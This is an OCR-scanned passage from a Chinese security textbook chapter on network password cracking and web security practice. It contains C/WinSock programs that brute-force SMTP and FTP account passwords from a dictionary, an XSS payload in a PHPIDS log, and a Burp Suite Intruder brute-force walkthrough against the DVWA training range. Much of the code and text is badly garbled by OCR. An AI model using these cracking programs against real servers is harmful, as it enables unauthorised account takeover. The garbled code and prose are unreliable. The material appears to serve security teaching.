saddr.sin addr.S un.S addr = inet addr ("xxx. XXxx. XXX. XXX");? 
// 连接 SMTP 服务 的 端口 号 

saddr.sin port = htons'(25); 


// 发 送 /接收 通信 数据 的 缓冲 区 
char szBuff[IMAX PATH] = { 0 二 


int nRet = connect(s, (SOCKADDR*)&saddr, sizeof (saddr)); 


recv(s; szBuff, MAXBYTE, 0); 
print£'("%s \r\n", szBuff)y 


Lotrepy (SseBute "autl Looin Ne Ni 
send(s, szBuff, strlen(szBuff), 0); 
printf( "Se \rNA", gz2BaFt)y 


recv(s, szBuff, MAXBYTE, 0); 
printf("%s NE\n" SzBuftf); 


// 这 里 的 xxx 替换 为 要 破解 的 SMTP 用 户 名 

lstrcpy (in, “xxx") > 

base64 encode(l (const unsigned char *)in, lstrlen(in), (unsigned char *)out); 
lstrcpy (szBuff, out); 

LetreatllseBufs "NTNnnY 

send(s, szBuff, strlen(szBuff), 0); 

BrLntE("Ss \rMn", SBuEF)’ 


recv(s;, SzZBuUff, MAXBYTE, 0); 
printE ("Ss VN SZ2BUEE):y 


lstpepy (dr (LPEOSTRY(* tdjct + 1) YY 

base64 encodel( (const unsigned char *)in, lstrlen(in), (unsigned char *)out); 
LetFcpy (SDButt, Out)> 

Let voat (tseure NPNnD)y 

send(s, szBuff, strlen(szBuff), 0); 

printf("%s \r\n", szBuff); 


recv(s, szBuff, MAXBYTE, 0); 
printf("%s \EN\A", sezBuEf); 


i (trelsZBuE "Ao 
{ 
printf ("Success \r\n")y 
Delnte (SN Nn Umea ee 韦 ) 汐 洲 
closesocket (s); 
break; 
1 
else 
{ 
printf ("Faild Nr\n"): 
} 


closesocket (s); 


WSACleanup (); 


册 吕 小 


住 将 剖 举 只 汀 


| 
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return nRetCode; 


} 

该 代码 是 控制 台 下 的 MFC 工程 ， 请 读者 建立 相关 工 
程 然 后 编译 连接 源码 后 测试 效果 。 该 程序 是 对 单一 SMTP 
账号 的 破解 ， 运 行 结 果 如 图 9-12 所 示 。 

图 9-12 就 是 程序 运行 后 的 结果 , 本 程序 只 针对 一 个 特 图 9-12 ”SMTP 破解 程序 运行 结果 
定 的 SMTP 账号 进行 破解 ， 读 者 可 以 自行 修改 为 能 够 破解 多 个 账号 的 程序 。 


9.2.2 FTP 服务 器 的 破解 


FTP (File Transfer Protocol) 协议 是 文件 传输 协议 , 通过 协议 的 名 称 就 能 看 出 是 等 同 于 传 
输 文件 所 使 用 的 协议 。FTP 服务 器 就 是 通过 FTP 协议 进行 文件 传输 的 服务 器 。FTP 服务 器 在 
默认 情况 下 通常 用 TCP 的 21 号 端口 作为 控制 端口 ， 用 于 FTP 命令 的 传输 ， 文 件 的 传输 并 不 
使 用 21 号 端口 。 如 果 FTP 服务 器 使 用 主动 模式 ， 那 么 传输 文件 时 FTP 服务 器 使 用 20 号 端 
口 ， 如 果 FTP 服务 器 使 用 被 动 模 式 ， 那 么 传输 文件 时 FTP 服务 器 会 随机 打开 一 个 大 于 1023 
人 对 于 破解 FTP 服务 器 只 需要 使 用 21 号 端口 即 可 。 

. FTP 服务 器 手动 登录 

RS 个 FTP 服务器， 有些 简 易 版 的 FTP 服务 器 就 是 一 个 单独 的 可 执行 文件 。 
通过 自己 本 地 的 FTP 服务 器 就 可 以 进行 手动 的 测试 。 笔 者 使 用 的 FTP 服务 器 就 是 从 网 上 随便 
下 载 的 ， 如 图 9-13 所 示 。 


















































月 服务 要 吾 启 动 服 守 六 避 。 可 E BD 加 录 时 间 
RE 让 103 必 全 HS EE TBS [ Pi 103 ‘a! 
sa www. Gxnn com FTP Servel | 
[6632] USEI | 
ee 331 3 For required for test | 
ES 321530 Please login with USER and PASS 
TE -一 er 
| 三 二 本 行 三 自动 EE 生 人 WE ] 
| 局 ”运行 状态 :| 旺 示 窗口 目录 : FF “A wl 
| 
制 : 加 超时 (分 }: 上 | 用 户 权 限 
| 订 允许 下 载 | 
信息 : Weicometo rn 三 允许 上 传 
! 三 允许 出 除 | 
Pa [Bosd Bye | 厂 允许 创建 目 邓 | 
Tm | Be Wo Ws 半 保存 


图 9-13 FTP 服务 器 配置 窗口 


图 9-13 中 就 是 笔者 用 于 演示 被 破解 的 FTP 服务 器 ， 该 FTP 基本 上 有 5 部 分 。 

左上 部 分 的 “1” 是 FTP 的 日 志 列 表 ， 此 处 会 显示 和 记录 FTP 服务 器 的 通信 记录 情况 ， 
从 中 可 以 看 出 FTP 是 明文 传输 用 户 名 和 密码 ， 这 样 账 号 和 密码 被 窃取 后 可 以 直接 使 用 。 

左下 部 分 的 “2” 是 FTP 的 基本 配置 ,包括 “服务 端口 "“ 连 接 限制 "”“ 欢 迎 信息 ”“ 超 时 ” 
等 。 对 于 FTP 服务 器 而 言 ， 默 认 的 端口 是 21 号 ， 但 是 可 以 自 定 义 进行 修改 ， 将 端口 号 修改 
为 其 他 的 端口 后 会 提高 一 定 的 安全 性 。 当 然 了 ， 即 使 修改 了 默认 的 端口 号 后 ， 如 果 “ 欢 迎 信 
息 ” 是 默认 的 ， 也 是 很 危险 的 。 试 想 ， 当 “黑客 ”扫描 到 一 个 不 知名 的 端口 后 ， 使 用 telnet 





全 





9.2 网 络 中 的 破解 





进行 连接 查看 ， 看 到 的 是 带 有 “FTP Server” 字 样 的 banner， 那 么 “黑客 ”就 可 以 确定 这 是 
一 个 修改 默认 端口 的 FTP 服务 器 了 。 

中 间 上 部 分 的 “3” 是 FTP 的 数据 统计 情况 。 

中 间 下 部 分 的 “4” 是 FTP 服务 器 管理 用 户 和 权限 的 部 分 ， 可 以 对 用 户 进 行 “ 增 加 ”“ 修 改 ” 
“删除 ”“ 禁 用 ”和 “添加 /修改 密码 ” 还 可 以 对 用 户 操作 文件 的 权限 进行 设置 , 包括 访问 的 目录 ， 
是 否 允 许 上 传 、 下 载 、 删 除 、 创 建 目 录 等 。 该 FTP 服务 器 并 没有 匿名 用 户 ， 如 果 有 匿名 用 户 需 
要 将 匿名 用 户 禁止 掉 。FTP 的 所 有 用 户 都 应 该 设置 密码 。 对 于 FTP 使 用 明文 传输 用 户 
名 和 密码 ， 即 使 给 用 户 名 设置 了 较为 复杂 的 密码 ， 也 可 能 通过 嗅 探 的 方式 盗 取 到 用 户 的 密码 。 

右上 部 分 的 “5” 是 显示 FTP 服务 器 当 
前 处 理 的 用 户 的 情况 。 

上 面 介 绍 了 FTP 服 务 器 的 简单 配置 等 情 
况 , 下 面 来 通过 命令 行 手动 登录 FTP 服务 器 。 
如 图 9-14 所 示 。 

首先 ， 通 过 telnet 命令 连接 FTP 的 他 地 
址 和 端口 号 ， 有 具体 如 下 : 


telnet 192.168,1.102 21 

接着 ， 输 入 “USER 用 户 名 ” 在 图 9-14 中 用 户 名 是 “test”; 

然后 ， 输 入 “PASS 密码 ” 在 图 9-14 中 密码 是 “123456”。 

如 果 ， 用 户 名 和 密码 都 能 匹配 正确 ， 那么 FTP 服务 器 返回 “230”， 如 果 无 法 匹配 则 返回 





图 9-14 FTP 服务 器 的 登录 


”“530”。 因 此 ， 在 编写 FTP 密码 破解 时 ， 通 过 “230” 和 “530” 即 可 得 知 当 前 破解 的 账号 和 


密码 是 否 可 以 登录 成 功 。 

在 命令 行 下 有 一 个 命令 是 “ftp” 命 令 ， 通 过 ftp 命令 后 面 跟 IP 地 址 ， 可 以 直接 连接 FTP 服 
务 器 (在 默认 端口 为 21 的 情况 下 )， 为 什么 要 使 用 telnet 命令 而 不 是 他 命令 呢 ? 原 因 是 ftp 命令 
连接 FTP 服务 器 后 会 提示 用 户 输入 用 户 名 ， 也 会 提示 用 户 输入 密码 ， 而 telnet 命令 连接 FTP 服 
务 器 后 没有 任何 提示 ， 需 要 用 户 自行 输入 FTP 协议 的 内 部 命令 “USER” 和 “PASS”。 这 说 明 fp 
命令 已 经 帮 用 户 省 去 了 输入 FTP 协议 内 部 命令 的 过 程 ， 但 是 在 编写 FTP 破解 工具 时 是 无 法 使 用 
ftp 命令 的 ， 而 是 需要 在 程序 中 自行 通过 发 送 “USER” 和 “PASS” 这 样 的 FTP 内 部 命令 来 完成 
的 。 因 此 ， 在 手动 测试 登录 FTP 的 时 候 ， 需 要 用 telnet 来 连接 FTP 服务 器 。 理 解 这 些 很 重要 ! 

2. FTP 服务 器 账号 密码 的 破解 

有 了 上 面 的 讲解 过 程 ， 就 可 以 来 完成 代码 的 实现 了 ，FTP 服务 器 账号 密码 的 破解 比 起 

- SMTP 并 不 复杂 ， 因 此 直接 看 代码 ， 代 码 如 下 : 

#include <stdio.h> 


#include <WinSock2,h> 
#pragma comment (lib, "ws2 32"); 


// 模拟 用 户 名 和 密码 字典 


char *user[5] = {"anonymous", "admin", "test", "user", "root"}; 
char *pwd[5] = {"anonymous”, “123456", "123456789", "1234567"}; 





int tmain(int argc: _TCHAR* argv[]) 
{ 
// 初始 化 WinsSock 
WSADATA wsaData = { 0 }7 
WSAStartup (MAKEWORD (2, 2), &wsaData); 





广 将 前 汤 昱 湘 ” 震 心 浪 
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// 循环 读 取 用 户 名 


第 Fo Co nt a i ee ri 和 | 全 
中 // 循环 读 取 密码 
ee Oe 

Ea { 
TW SOCKET s = socket (PF INET, SOCK. STREAM,. 0)» 
客 sockaddr in saddr = f OW; 
编 saddr.sin famiiy = AF LNET,; 
程 // 连接 SMTP 服务 器 
实 asaddr.,.sinaddr,.Sun.S addr a inetLadde(l Lo. L680 LT OR): 
例 // 连接 SMTP 服务 的 端口 号 

saddr.sin port = hitons(21); 

| // 发 送 /接收 通信 数据 的 缓冲 区 





char szButf [MA PATH],. = {0}; 
int nRet = connect(s, (SOCKADDR*)g&saddr, sizeof (saddr)); 


// 打印 banner 
KEec (Sa | szputf, MAXRBYTR, D) 地 
NEN 


ZeroMemory (szBuff, MAXBYTE); 


/7 发 送 USER 命令 
sprinttllszBurt, "VSER SeNrNn, mser lt] 
send(s, 32BufE, strlen(szButfE), OS 


ZeroMemory (szBuff, MAXBYTE),; 
// 接收 回 显 

recv (sy S22Buft;l MAXBYTE, 0) 
BELmEE( Nes NEV SS Bus) 


ZeroMemory (szBuff, MAXBYTE); 


// 发 送 PASS 命令 
SpEinti(szBuftf, PASS SoeNz Nn pwald])s 
sendtls, szBuff, strien(szBufftf), OO)' 


// 接收 回 显 
ZeroMemory (szBuff, MAXBYTE); 
recov(s, Ss2Butf, MAXBYTE, QO: 


// 判断 是 否 为 230 
st a (=: len: a oa (eA Ss ded ead oe 
4 
peanmtt (uoeess VN) 
printf ("userss password: Sse\r\Nan weerlely Pwaldl 状 
closesocket (s); 
goto" EXTE; 
else 
{ 
Belntet (ma bd Ne vs 
} 


closesocket (s); 
} 
总 其 下 王 坟 
WsACleanup () ; 


return 0; 














代码 没有 任何 有 创意 的 地 方 ， 同 样 没 有 较 新 的 知识 
完成 了 FTP 的 登录 通信 过 程 ， 通 过 不 断 改 变 用 户 名 和 密码 3 
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点 ， 代 码 仍然 是 使 用 WinSock 来 模拟 
尝试 登录 ， 通 过 返回 值 来 判断 是 


人 否 成 功 ， 一 旦 登录 成 功 就 将 破解 出 来 的 账号 和 密码 进行 输出 显示 。 程 序 运行 如 图 9-15 所 示 。 
在 图 9-15 中 的 最 后 可 以 看 到 输出 来 破解 出 来 的 用 户 名 和 密码 。 在 前 面 介 绍 过 , FTP 服务 


器 有 运行 日 志 ， 那 么 回 到 FTP 服务 器 的 管 


图 9-15 FTP 服务 器 破解 程序 运行 结果 


从 图 9-16 中 可 以 看 到 FTP 服务 器 的 日 志 记 录 了 同一 
志 可 以 看 出 该 卫 地 址 存在 尝试 账号 


么 通过 该 日 


火 墙 的 安全 策略 ， 或 FTP 服务 器 的 黑 名 单 ， 
程 中 很 可 能 会 用 多 个 不 同 的 卫 地 址 来 进行 破解 ， 
略 ， 即 在 尝试 登录 失败 N 次 以 后 ， 则 禁止 该 账号 

学 习 暴 力 破解 的 目的 并 不 是 让 大 家 去 做 这 
人 础 协议 ， 对 于 学 习 网 络 而 言 协 议 才 是 本 质 。 


9.3 Web 安全 


在 Web 应 用 、 互 联网 、 电 子 商 务 的 快速 发 展 中 ， 


理 界面 查看 它 的 运行 日 志 


， 如 图 9-16 所 示 。 








[1000] USER test ~ 
[1000] 331 Password required for test 

i1000] PASS anorymous 

[1000] 530 Not logged in, user or password incorrecH 
[1000] Client disconnected from 192.168.1,102 
[8135] Client connected from 192.168.1.102 

[6136] 220 Welcome to www. Gxnn.com FTP Serverl 
[6136] USER test 

[6136] 331 Password required for test 

[6136] PASS 123456 

[6136] 230 User successfully lcggsd in 

[6136] Client disconnected from 192.188.1.102 


图 9-16 FTP 服务 器 运行 日 志 


个 耳 地址 的 大 量 登 录 失 败 的 信息 ， 那 


及 密码 的 暴力 破解 。 那 么 ， 管 理 就 可 以 通过 防 
禁止 该 了 了 地 址 的 连接 。 当 然 了 ， 在 暴力 破解 的 过 
那么 可 以 淹 下 下 证 登录 的 账号 设置 相应 的 安全 策 

- 定 的 时 间 ， 这 样 也 可 以 防止 暴力 破解 的 成 功 。 
文 样 毫 无 意义 的 事情 ， 重 点 是 了 解 一 些 网 络 的 基 


Web 安全 从 早期 的 电视 媒体 已 经 走 到 了 


大 众 的 视野 以 及 生活 当中 。Web 安全 也 随 之 越 来 越 受到 网 络 安全 爱好 者 的 关注 ， 本 章 就 来 介 
绍 一 下 Web 安全 相关 的 知识 以 及 完成 一 些 简 单 的 Web 安全 工具 。 


Web 安全 的 演示 
Web 安全 早 天 常用 的 二 QIENEAR 滞 后 水 SSSvGSRE 竺 深 步 地 洲 行 。 睛 着 We 滑 和 


技术 的 不 断 发 展 ， 也 使 得 Web 安全 防护 也 在 不 断 地 提升 ， 从 WAF、 防 自 改 、 
绍 如 何 搭建 一 个 用 来 学 


方面 来 提升 Web 应 用 的 安全 
绍 一 些 简单 的 Web 安全 相关 的 工具 8 
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习 Web 安全 的 环境 ， 并 介 
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1. 安装 DVWA 靶场 系统 

在 近 些 年 信息 安全 的 高 速 发 展 中 , 初学 者 已 经 很 难 找到 一 个 网 站 进行 渗透 了 ， 曾几何时， 
一 个 漏洞 ， 一 个 工具 就 可 以 在 网 上 找到 很 多 有 漏洞 的 网 站 去 体验 ， 当 然 渗透 一 个 未 经 授权 的 
系统 是 非法 的 。 因 此 ， 为 了 能 够 较为 真实 地 学 习 Web 渗透 的 各 种 技术 ， 就 需要 找 一 个 专门 用 
于 学 习 的 Web 演练 平台 ， 人 们 将 这 种 用 于 练习 渗透 的 平台 称 为 “ 邯 场 ”。 

本 节 介 绍 如 何 搭建 由 PHP+MySQL 编写 开发 的 一 套 靶 场 系统 DVWA。DVWA 可 以 进行 
SQL 注入 、XSS、CSRF、 文 件 上 传 等 漏洞 的 演练 ， 由 于 该 系统 提供 了 多 个 安全 演练 级 别 ， 
此 可 以 逐步 地 来 提高 Web 渗透 的 技术 。DVWA 是 一 套 开 源 的 系统 ， 在 练习 Web 渗透 技术 的 
同时 ， 也 可 以 通过 阅读 源码 学 习 到 对 于 各 种 漏洞 的 安全 防护 编码 。 

DVWA 是 由 PHP 和 MySQL 开发 的 ， 因 此 首先 需要 在 系统 中 搭建 一 个 支持 PHP 的 Web 
服务 器 。 网 上 有 很 多 支持 PHP 和 MySQL 的 Web 服务 器 集成 环境 ， 比 如 Wamp、phpStudy 等 ， 
这 里 我 个 人 推荐 使 用 phpStudy， 该 软件 支持 多 个 Apache、MySQL、PHP 的 版 本 ， 切 换 也 非 
常 方便 。phpStudy 直接 下 载 安 装 即 可 使 用 。 下 载 安装 启动 后 如 图 9-17 所 示 。 

图 9-17 中 “phpStudy 启 停 ”处 的 “启动 ” 和“ 停 pe 












Ee 













止 ”用 于 控制 Apache 和 MySQL 的 启动 和 停止 , 只 要 | 时 一 一 ] 
单 击 “启动 ”就 可 以 方便 地 使 用 支持 PHP 和 MySQL oa ee | me | | | 


的 Web 服务 器 了 。 

在 DVWA 的 官网 下 载 DVWA 系统 ， 笔 者 这 里 下 
载 的 是 DVWA 1.9 版 本 。DVWA 是 一 个 压缩 包 文件 ， wn | | | 
下 载 后 直接 解压 到 对 应 的 Web 站 点 目录 下 ， 然 后 就 可 | wwe | 
以 安装 该 系统 了 。 笔 者 使 用 的 是 phpStudy 的 Web 服 | = 
务 器 , 那么 下 载 后 解压 的 位 置 就 在 “phpStudy WWW” 上 一 一 一 一 一 一 ee 
目录 下 图 9-17 phpStudy 界面 
在 DVWA 的 解压 目录 下 的 config 目录 下 找到 “config.inc.php” 的 PHP 文件 ， 然 后 修改 
相对 应 的 配置 ， 需 要 修改 的 配置 内 容 如 下 : 


# Database variables 

# WARNING: The database specified under db database WILL BE ENTIRELY DELETED quring setup， 
# Please use a database dedicated to DVWA. 

$_DVWA = array(): 


运行 模式 一 一 FJE 片 本 
个 系统 服务 
合 非 服务 模式 




































$_DVWA[ ‘'db_server' 1] A ey Pe Oe TE 
$,DVWAL 1Gb database' ] = ‘dvwa'; 
SDVWAT "db user'.] ca a Ee 
SuDVWAtE "ob Dassworad yl lS root 


# ReCAPTCHA settings 

# Used for the 'Insecure CAPTCHA' module 

# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin/create 
§$ DVWAI 'recaptcha public key' ] = "6LAK7xITAAZZAAJOTfEL7fuU6T-0aPl8KHHieAT yJg'; 
$_DVWA[ 'recaptcha private key' ] = '6LdK7xITAZZAAL UW9OYXVUOPOIHPZLfw2KINnSNVO", 


在 配置 中 $_DVWA['db_user] 是 MySQL 数据 库 的 用 户 ,$_DVWA['db_password'] 是 MySQL 
数据 库 的 密码 ，$_DYyWA['db database] 是 DVWA 在 MySQL 数据 库 中 的 库 名 。$_DVWA 
['recaptcha_public_key'] 和 $_DVWA['recaptcha_private_key'] 就 是 用 书 中 这 两 个 即 可 ， 这 个 配置 
是 在 使 用 “Insecure CAPTCHA” 模 块 时 会 使 用 到 。 

除了 修改 DVWA 系统 的 配置 文件 以 外 ， 还 需要 修改 PHP 的 配置 文件 ， 笔 者 这 里 使 用 的 是 











外 
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PHP 5.3 的 版 本 ， 有 具体 读者 使 用 的 版 本 可 以 在 phpStudy 中 查看 。 笔 者 以 自己 的 系统 进行 说 明 ， 
在 phpStudy 安装 目录 下 找到 文件 夹 “\php53”， 这 就 是 PHP 5.3 版 本 的 文件 夹 (如果 使 用 其 他 
版 本 的 也 可 以 找到 对 应 的 目录 )， 在 该 目录 下 找到 php.ini 的 配置 文件 ， 搜 索 “allow_url_include” 
参数 ， 找 到 该 配置 选项 ， 将 该 配置 选项 开启 ， 有 具体 如 下 : 


7 Whether £0 allow include/regquire to oper URLs (like REttp:// or ftp://) as files. 
; http://php.net/allow-url-include 
allow url include = On 


该 配置 项 是 保证 使 用 “File Inclusion” 模 抉 时 可 以 正常 使 用 。 

2. DVWA 介绍 

修改 完 上 述 配置 后 ， 在 浏览 器 中 输入 http://localhost/dvwa/setup.php 即 可 打开 “Setup 
DVWA ”页面 ， 到 这 里 就 可 以 开始 安装 系统 了 。 在 该 页 面 中 的 最 下 方 ， 有 一 个 “Create/Reset 
Database” 按 钮 ， 单 击 该 按钮 后 会 创建 数据 库 ， 并 自动 跳 转 到 DVWA 系统 的 登录 页 面 ， 在 登 
录 页 面 中 输入 “admin” 和 “password”， 即 可 登录 DVWA 系统 ， 登 录 系 统 后 就 可 以 看 到 DVWA 
系统 提供 的 Web 安全 可 以 演练 的 内 容 ， 如 图 9-18 所 示 。 

在 图 9-18 中 是 DVWA 的 所 有 可 以 练习 的 模块 ， 包 括 “ 暴 力 破解 ”(Brute Force)、“ 命 令 
注入 ”(Command Injection)、“ 跨 站 伪造 请 求 ”(CSRF)、“ 文 件 包含 ”(File Inclusion)、“ 文 件 
上 传 ”(File Upload)、“ 不 安全 的 验证 ”(Insecure CAPTCHA)、“SQL 注入 ”(SQL Injection 
和 SQL Injection Blind)〉 以 及 “ 跨 站 脚本 ”(XSS Reflected 和 XSS Stored)。 

在 DVWA 系统 中 的 CSFR、SQL Injection、XSS 等 渗透 测试 模块 ， 每 个 模块 都 有 4 个 安 
全 级 别 ， 如 图 9-19 所 示 。 





SOUrCe code to the 


a to DVWA v1 





图 9-18 DVWA 学 习 模块 9-19 DVWA 模块 安全 级 别 


在 DVWA 系统 中 还 有 WAF (Web Application Firewall) 的 功能 ， 在 DVWA 中 称 为 PHPIDS， 
即 PHP 入 侵 检 测 系 统 ， 如 图 9-20 所 示 。 





PHPIDS 


iDS vw.6 iPHP-Intrusion Detection System) is a security |ayer for PHP based web applications 
PHPIDS works by fitering any user'suppliad input against a blacklist of potantially malicious code jt is used in 
DYVWA to serve as a lve example of how Web Application Firewalls (WAFs) can halp improve secunty and in 
some cases how WAFS can be circumwented 


Youy Gar enable PHPIDS across this site for the duration of yout sessior 


PHPIDS is currenty' disabled. [Enabhs PHPIDNS)] 
[Similate attack].- [View IDS log] 





图 9-20 DVWA 的 PHPIDS 模块 
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在 PHPIDS 这 里 有 3 个 连接 可 以 单 击 ， 分 别 是 “[Enable PHPIDS]”( 开 启 PHPIDS)、 
“[Simulate attack]”( 模 拟 攻 击 ) 和 “[View IDS log]”( 查 看 IDS 日 志 )。 查 看 当前 PHPIDS 的 
状态 是 屏蔽 的 ， 先 来 单 击 “[Simulate attack]”， 查 看 浏览 器 的 地 址 栏 ， 如 图 9-21 所 示 。 








< 与 localhost/dvwa-1.9/security,php?iest= "> <script>eval(window.name) </script 





DVWA Security ® 


Security Level 








; Security level is curently: low 
由 - 
图 9-21 开启 PHPIDS 前 的 Simulate attack 地 址 栏 














在 图 9-21 的 浏览 器 地 址 栏 可 以 看 到 在 该 页 面 的 连接 后 增加 了 一 些 攻击 或 危险 的 参数 。 现 
在 单 击 “[Enable PHPIDS]”， 然 后 再 次 单 击 “[Simulate attack]”， 如 图 9-22 所 示 。 











< ey localhost/dvwa-1.9/security.php?test 


Hacking attenmbt detected and logged. 
Have a nice day. 





图 9-22 开启 PHPIDS 后 的 Simulate attack 地 址 栏 


从 图 9-22 可 以 看 出 ， 开 启 PHPIDS 后 ， 对 于 地 址 栏 中 提交 的 攻击 参数 会 被 拦截 ， 并 记 
录 到 日 志 当 中 。 返 回 上 一 个 页 面 中 单 击 “[View IDS log]” 将 会 显示 出 所 有 的 日 志 记录 ， 如 
图 9-23 所 示 。 





PHPIDS Log 


Date/Time: 2010-03-15T23-07:01+00:00 

Vulnerability: xss csrf id rfe Ifi sqli 

Request: idhywa/security.php?test=%22%3E%3Cscrpt% iEevallwindow name)s3C/seript% 3E 

Variable: REQUEST+test="><script>erval{window. name}</scrnpt> GET tast="><script>eval(window name) 
</script> 


IP; 127.0.0.1 





图 9-23 PHPIDS 日 志 


3. DVWA 系统 练习 实例 

在 这 里 对 DVWA 进行 一 下 简单 的 演示 ， 笔 者 在 这 里 将 安全 级 别 选 择 为 “low”( 低 )， 且 
没有 开启 PHPIDS 。 

(1) Brute Force 模块 练习 

Brute Force 是 暴力 破解 的 意思 ， 是 指 黑客 利用 穷 举 工具 并 配合 合理 的 密码 字典 ， 来 猜 解 
用 户 的 密码 。 在 前 面 的 章节 中 已 经 完成 过 了 关于 SMTP 协议 和 FTP 协议 暴力 破解 的 程序 。 在 
本 节 主 要 是 来 介绍 Burp Suite 工具 , 与 DVWA 的 Brute Force 模块 。 在 DVWA 中 打开 Brute Force 
模块 ， 如 图 9-24 所 示 。 








中 
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在 图 9-24 中 可 以 看 到 有 两 个 用 来 接受 “Username” 和 “了 Password” 的 输入 控件 ， 还 有 


一 个 “Login” 按 钮 。 该 模块 是 用 来 测试 暴力 破解 

的 , 那么 如 何 才能 够 进行 暴力 破解 呢 ? 难道 一 个 渗 | i 刘 刘 到 开间 Vulnerability: B 
透 平台 也 需要 自行 编程 来 完成 任务 吗 ? 那样 对 于 “| eee0 | Login 

没有 编程 基础 的 Web 安全 初学 者 就 要 求 太 高 了 ， | ， E enene 


而 且 在 很 多 实际 的 情况 下 , 通常 是 使 用 现 有 的 工具 | [EGR | | 
来 进行 检测 。 本 节 就 选用 一 款 Web 安全 检测 及 攻 | EGR 
击 的 套件 来 完成 暴力 破解 的 任务 , 该 检测 套件 就 是 
著名 的 Burp Suite。 

Burp Suite 是 一 款 集合 了 Web 安全 检测 及 攻击 
的 套件 ， 它 像 是 一 款 瑞士 军刀 一 样 ， 每 一 项 功能 都 可 以 独立 完成 特定 的 功能 ， 而 且 各 个 功能 
还 能 配合 进行 使 用 ， 从 而 发 挥 更 强大 的 作用 。Burp Suite 界面 如 图 9-25 所 示 。 
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pr 


图 9-24 ”Brute Force 模块 


Barp_ Intruder Repeater Window Help 











Fiter. Hiding not tound terms， hidng CSS, image and general binary content: hiding 4xx responses, hiding empty fokjers 




















图 9-25 Burp Suite 界面 


关于 Burp Suite 不 做 过 多 的 介绍 ， 笔 者 直接 演示 如 何 使 用 Burp Suite 来 测试 DVWA 中 
Brute Force 的 模块 。 

在 Burp 中 选择 “Proxy” 页 签 ， 即 代理 页 签 ， 在 该 页 签 下 选择 “Options” 子 页 签 ， 来 设 
置 一 个 监听 的 他 地 址 和 端口 号 。Burp 的 代理 功能 是 专门 用 于 拦截 HTTP 和 HTTPS 数据 用 的 ， 
它 存 在 于 浏览 器 和 目标 应 用 之 间 ， 它 可 以 将 拦截 到 的 HTTP/HTTPS 数据 进行 修改 后 再 次 发 
送 ， 它 是 整个 Burp 套件 的 核心 部 分 。 在 设置 好 代理 地 址 之 后 ， 切 换 到 “Proxy” 页 签 下 的 
“Intercept” 子 页 签 ， 并 将 “Intercept is on” 按 钮 激活 ， 即 启动 代理 拦截 功能 ， 开 始 拦截 
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HTTP/HTTPS 的 数据 。 虽 然 Burp 的 代理 拦截 功能 设置 好 了 ， 但 是 工作 只 是 完成 了 一 半 ， 和 列 
下 一 半 需 要 设置 浏览 器 的 代理 ， 通 过 设置 浏览 器 的 代理 地 址 为 Burp 监听 的 地 址 和 端口 从 而 将 
请 求 的 HTTP/HTTPS 数据 发 送 给 了 Burp， 这 样 Burp 就 相当 于 在 Web 应 用 与 浏览 器 之 间 了 。 
如 图 9-26 所 示 。 


册 @ 浅 


Burp_inirudef Repeater Window Heip 
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Cn | | 加 Burp Proxy Uses listeners to receive incoming HTTP requests from your browser. Yotl 
| Ne 
| a 
| | Add | |Running | interface | nvisible | Redirect 
= [ea 127.0;0.1:8080 回 
[es | 
| Remove | | 
(a) 
Re 
代理 服务 器 设置 
使 用 iE 代理 
不 使 用 代理 
127.0.0.1:8087 
127.0.0.1:8085 
127.0.0.1:8080 





127,0.0,1:9090 
127.0.0,1;3081 


(b) 
图 9-26 Burp 设置 


可 以 说 前 面 的 准备 工作 已 经 完成 了 , 接 下 来 在 DVWA 的 Brute Force 模块 的 “Username” 
框 和 “Password” 框 输入 账号 “admin” 和 任意 一 个 密码 ， 单 击 “Login” 来 进行 登录 。 这 时 
Burp 就 会 拦截 住 浏览 器 提交 的 HTTP 请求， 如 图 9-27 所 示 。 








1 SET /ewwa-l.S/vilnerabilities/hrute/ usernae=adinipassword=-173456Login=Loyin HTTP/1.1 
Host: localhnst 

Accept: text/hteml, applicaricon/shtmlt+xnl ,application/xml ;oq=0.5,image/webp, */*7d=0.8 
Upyrade-Insecure-Reduests: 1 

User-Agqent: Mozilla/S.0 (Windows NT E.3; WIWE4) AppleWVebFit/S537.3E (FHTML, like Gecjo) Chrome/S5D.0. Sel. 10° Safari/S537. 46 
Neferer: http://iocalhost/dv wa-li.9/vulnerabilitices/brute) 

kocept-—Encoding; yeip, deflate, sdeh 

Accept -Languadge: zh-CN,zhidq=0.8 

Cookie; seourity=low; pov_ pwi=as285427207 Hm lvt OagbhOdo0da0to0schg7T TdbSccadlfO0dc08=1505110577; a5787 times=l; 

mA35E4 times=1; Hm lt_B2l1L6c67S5a6d504a5cDE750733E2RefEft=1507509391,1507E24202,1507E829E871507855241: 

PHPSESSID=qhiro rqlrhar dTacslrddintdne 

Cormection: rlose 














图 9-27 Burp 拦截 的 HTTP 请 求 


在 HTTP 的 数据 上 单 击 右键 ， 在 弹出 的 菜单 上 选择 “Send to Intruder”， 然 后 切换 到 
“Intruder” 页 签 下 的 “Positions” 子 页 签 中 ， 如 图 9-28 所 示 。 注 意 观 察 其 中 的 数据 ， 有 很 多 
值 都 在 两 个 “$” 符 号 之 间 ， 读 者 需要 将 这 些 “$” 符 号 清除 ， 单 击 “Clear$” 即 可 将 所 有 的 
“$” 清 除 ， 然 后 选中 第 一 行 中 间 的 “password=12345” 的 “12345” 这 是 刚才 在 “Password” 
框 中 笔者 输入 的 密码 ， 选 中 它 以 后 单 击 “Add$” 按 钮 ， 将 选中 的 “12345” 变 成 “$123458”，, 
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muaet Repeater i [aa ee Extender pract optons | Pan na Alerts 





























十 
| 
| | Start attack | 
| Configure the positions Where pavioads will be insarted nto the base reouest. The attack type determines the Way in Which payloads are assigned to 
| payicad postions - see heip for fuf detals， 
| = sa EE 
| Attack type: | Sniper 
| 
| [5ET /avwa-l S/valnerabilitiesihrute/ usernane -De pas sr a= orin ly HrTP/L mtr 
| Host: localheost | 
| Accept: Cexr /htnl, Application/%htwltiml ,application/nmi;q=0. 9,image/wabp, “/* ;d=0. 6 一 一 一 一 -一 
| Upgrade-Insaceure-hediests: 1 | Clear§ | 
| User—Agent, Mozilla/5.0 (Yindows HI 6.3; WOWE41 ApplaVebFir /S537,36 (FHTHL, like Geclko) 
Chrome/5t.0. S661.102 Safari/537. 36 [a 
| Rerterer: hrtp://iocaihost/ /Ama-1.9/vulinerabilitvies/brurer 
‘Accept -Encoding: gzip, deflacte, sdch 三 
| Accept—Linguage: sh-CH,2h7dq=0,9 [| 


Cookie; security=-BIEWY: pyv_pvi=-BNanangy 

| Hn ive DagbOdodd tdsebare ee 
Ha 1vt_ 62118cETSaddS04aAscOE7S073nercr- 
PHPSESS1D -SNEVAN ET 


